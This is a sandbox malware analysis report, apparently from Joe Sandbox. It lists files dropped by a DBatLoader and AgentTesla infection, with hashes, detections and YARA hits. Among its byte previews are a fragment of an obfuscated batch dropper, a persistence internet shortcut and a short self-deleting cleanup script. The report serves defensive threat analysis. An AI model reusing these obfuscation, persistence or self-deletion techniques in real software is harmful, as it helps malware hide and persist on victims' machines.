	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	198.252.105.91

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\lxsyrsiW.pif	qqig1mHX8U.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse
C:\Users\Public\Libraries\Wisrysxl.PIF	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.277745813679996
Encrypted:	false
SSDEEP:	12288:mImGUcsvZZdubv7hfl3xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlhsqjnhMgeiCl7G0nehbGZpbD
MD5:	A8D3435B3F877F2BB99655D1A44B3190
SHA1:	F325D96F0B41E1B34BC6BA13CB7100F6BA5D4BE1
SHA-256:	7DF347C1C12A1E743FE8EB7AB9B175968C30D08A1602F3EAFF79CC09B40BBA5E
SHA-512:	0C1B18A17F66E07039F0B203A74C25F17651A69B8C689654CCB5C0FA2DE043EC20C803694EC4C10738750F134071634F205614AF36AF01414D3B1AB2AD3659A8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Users\Public\Libraries\PNO

Download File

Process:	C:\Users\user\Desktop\2jbMIxCFsK.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:rv:7
MD5:	9FBAF1370E81FDE19A18A160FC15ECF9
SHA1:	B0BC63263E276CE846F436531B7A2E2AF3EEF53F
SHA-256:	3C0A9FF56BD9A95864731AB94CCCCE154E70FCB82FFE8988AE93DAABEE635AD9
SHA-512:	9BD1495821C1213F92BC28974355572FA5CE36CC2C2BDB6B0C8A6291D54197A979E2878046792861538F7E3EC5FFBC8E4B76BC23AC8D18C0151265A4EA49DD8C
Malicious:	false
Preview:	27..

C:\Users\Public\Libraries\Wisrysxl

Download File

Process:	C:\Users\user\Desktop\2jbMIxCFsK.exe
File Type:	data
Category:	dropped
Size (bytes):	1921890
Entropy (8bit):	7.398856770638502
Encrypted:	false
SSDEEP:	49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
MD5:	34E82F30B12F324DB1D2604CFA91CBB2
SHA1:	20001D49CD86B776EE8072A07F536B7330A77F97
SHA-256:	F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
SHA-512:	47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
Malicious:	true
Preview:	...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.

C:\Users\Public\Libraries\Wisrysxl.PIF

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1392640
Entropy (8bit):	7.401846851033825
Encrypted:	false
SSDEEP:	24576:in5YMTKJPtU65L4oU78G6Hd8b2s17EeL4fFyV2vkSotd/ADgKczxj5z:wzGSkfQJSgK
MD5:	67DAC6AE9EE770115DB85CC71979DC41
SHA1:	A708539EBB312329F56F064A8491E4C6E1BD7CE8
SHA-256:	054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
SHA-512:	9FF88C70D4A2F7628A2F853D576B8E7D7EBF3409DE13D56895A06EB2FDC827BEEF45EC982DBC69A9577ED78D27D44F5DF2284CDF614BA4DEBADAF74CD07C204D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Joe Sandbox View:	Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........x............@..............................................@...............................'...P...........................r..................................................h...<............................text....Z.......\.................. ..`.itext..L....p.......`.............. ..`.data...............j..............@....bss.....6...@....... ...................idata...'.......(... ..............@....tls....4............H...................rdata...............H..............@..@.reloc...r.......t...J..............@..B.rsrc........P......................@..@.....................@..............@..@................................................................................................

C:\Users\Public\Libraries\lxsyrsiW.cmd

Download File

Process:	C:\Users\user\Desktop\2jbMIxCFsK.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:	dropped
Size (bytes):	62357
Entropy (8bit):	4.705712327109906
Encrypted:	false
SSDEEP:	768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:	B87F096CBC25570329E2BB59FEE57580
SHA1:	D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:	72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:	false
Preview:	@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

C:\Users\Public\Libraries\lxsyrsiW.pif

Download File

Process:	C:\Users\user\Desktop\2jbMIxCFsK.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.328046551801531
Encrypted:	false
SSDEEP:	1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:	C116D3604CEAFE7057D77FF27552C215
SHA1:	452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:	9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: qqig1mHX8U.exe, Detection: malicious, Browse Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse Filename: IBKB.vbs, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse Filename: x.exe, Detection: malicious, Browse Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

C:\Users\Public\Wisrysxl.url

Download File

Process:	C:\Users\user\Desktop\2jbMIxCFsK.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.094576921115185
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxwIKIAXv:HRYFVmTWDyzPtZExm9Xv
MD5:	872B7C81F3F3386DD4B548A0A47317B1
SHA1:	DECF92F684540FA8E0ED6AB511103D60B76381C5
SHA-256:	A532CF98C96AE348B516E9B983C7103D8E62628330236692C83AC91A68C35767
SHA-512:	8ABF0C52D7F6BEE4F9B56AEBDC42C4F6CF04BA4AC2BB882F6C51EF200DA1E441DCD7EE9FA6830FC8932A78A9C25C91CC040204B2A7A000BBD2E792748B499A37
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=948034..HotKey=10..

C:\Users\Public\alpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	236544
Entropy (8bit):	6.4416694948877025
Encrypted:	false
SSDEEP:	6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:	4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:	80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\xpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.742964649637377
Encrypted:	false
SSDEEP:	384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
MD5:	B3624DD758CCECF93A1226CEF252CA12
SHA1:	FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
SHA-256:	4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
SHA-512:	C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z.....................2......P4.......@....@..................................c....@...... ..........................`a..\|....p.. ...............................T............................................`..\............................text....)......................... ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
MD5:	4DC84D28CF28EAE82806A5390E5721C8
SHA1:	66B6385EB104A782AD3737F2C302DEC0231ADEA2
SHA-256:	1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
SHA-512:	E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fg4ivyor.q5h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2wmzfar.vow.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgeewco4.ffv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsdkekhz.lf5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\neworigin.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	5.008874766930935
Encrypted:	false
SSDEEP:	3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
MD5:	D6A4CF0966D24C1EA836BA9A899751E5
SHA1:	392D68C000137B8039155DF6BB331D643909E7E7
SHA-256:	DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
SHA-512:	9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.\|........................................

C:\Users\user\AppData\Local\Temp\server_BTC.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	164
Entropy (8bit):	4.966210631858107
Encrypted:	false
SSDEEP:	3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRIN2BQty:hWKdbuoL923fJWAawDNe923fT/
MD5:	39E753C87561C46E44E9798D3E4BCEEF
SHA1:	8B0401FA48A3E0E73EE65F84BDA99A59C17A710D
SHA-256:	0B017EB66D379DE60B3118CE72BA3AB4486A3AFD3A330E64E9600F5E6C1AE743
SHA-512:	7204572F6090551C75C7A10516BF8120779B300201CBBCA036D0908F88F138C6BF761D9E235CA7DDB7FBAC644AB948285EA2DEFB7AE2146EE71793BA4704833F
Malicious:	false
Preview:	@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpBC1D.tmp.cmd" /f /q..

C:\Users\user\AppData\Roaming\7270c52c6967b89b.bin

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.984103135097405
Encrypted:	false
SSDEEP:	192:CBUHcuAnZ/dLAf61Fxmux3rldRPYmyzbPkIXjydjsLds2FdGqi0:CWMnUSDh3hdRwmyHPkyyFs+0
MD5:	49E2109376AFDD58252C8021871C153C
SHA1:	2F260DE09CD67D6B3A010294CB6CFE07EC3B1491
SHA-256:	659A6E56D3610D607C7380CE2114A56C2776BD3AA7BBB7BE97B9B06AB02199C9
SHA-512:	EFE35896D79AFDF8934A8B1121660F683712B2FD7724C7A805532F6AAA1C66E5FF6EDE89FC434D12FEFFA873C84371C367524F96D767A6F19DE3D8D04E284D61
Malicious:	false
Preview:	.....m:......`...2'@...q:.\|`n@......~f.V...W!.....ml...Y..(..M.;V.......3......(I..].?...O..\5.GPA<.....J.d1.,WL.}..c......L8.]..ix......O.Gm?6...Z..e.f@........x:0.7.!....$73~.W.`.R....v~T......t[..;.Z..Y..-.fc.J4..F..,.....B.=.#E.n.D......V..ZRL.}P...E.M....He0..,-}.r\..)'\:...k5..k.....}.n.T..n../.......U2v...P...o_&.....w..I.>.03...DO\.........=Caz.%...u&9.$.O..+\._8..px[.&j=.-......u...NCC...>..@..w;.:...F....~.."r..>.FD..k.U..;..J#.0.C@.g.LO,.#....`. [.s3.../..I....w.V...:...............j.6.............j...u.X..K?.h.}.....X...+.....x...(o..3...b..`..\.CD.JC.=R8o6...._\|.p.....sE...)V>.._.[....b3.......n..1....j.@.t.M..s.......by.r.5....<.te....o..i.\|..6..0....DE.{...t..I... .....A$....B..H...H...n6me....1~}!..L.#Y.@..n.T..[../YR.."...$..q......G..NK.H..dR.c..l...'..]c..eEl..11..I...Y.K`X..0l...a.m.Vt.`....K6.m.yLfS....7.8'.O.c...U.H.R~J9."'..9.x.....w...5...u..Z..~Xx...30Q..K<x.Uf`....O.{.Y..[.ivf....u..%.....y.....uu

C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
